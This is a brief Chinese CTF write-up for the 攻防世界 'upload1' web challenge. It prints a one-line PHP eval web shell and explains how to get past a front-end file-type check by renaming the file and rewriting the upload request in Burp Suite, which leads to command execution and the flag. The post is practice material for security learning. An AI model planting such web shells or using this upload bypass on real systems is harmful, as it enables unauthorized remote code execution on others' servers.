攻防世界upload1

半夜放水

 关注

阅读 70

2022-01-31

upload1

在这里插入图片描述

进入环境就一个上传,我们先上传一个普通的木马文件看看

木马内容

<?php @eval($_POST["cmd"]); ?>

在这里插入图片描述

估计是前端校验我们查看源码

在这里插入图片描述

只能上传jpg和png图片,那我们将木马后缀改为.jpg然后使用bp抓包并把后缀改为.php即可

在这里插入图片描述

在这里插入图片描述

然后访问木马文件执行指令即可

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

执行后查看源码便发现flag

在这里插入图片描述

相关推荐

攻防世界Web “warmup、NewsCenter、upload1”题解

我是小小懒 83 0 0

[ACTF2020 新生赛]Upload1

火热如冰 33 0 0

【BUUCTF】[极客大挑战 2019]Upload1

芭芭蘑菇 62 0 0

攻防世界--Confusion1

点亮自己的那盏灯 48 0 0

攻防世界re1

丹柯yx 74 0 0

攻防世界wp(web1)

脱下愤怒的小裤衩 130 0 0

攻防世界new bird区1——5

minute_5 64 0 0

攻防世界-fakebook

若如初梘 47 0 0

攻防世界 warmup

juneyale 41 0 0

攻防世界 supersqli

十里一走马 35 0 0

精彩评论(0)

0 0 举报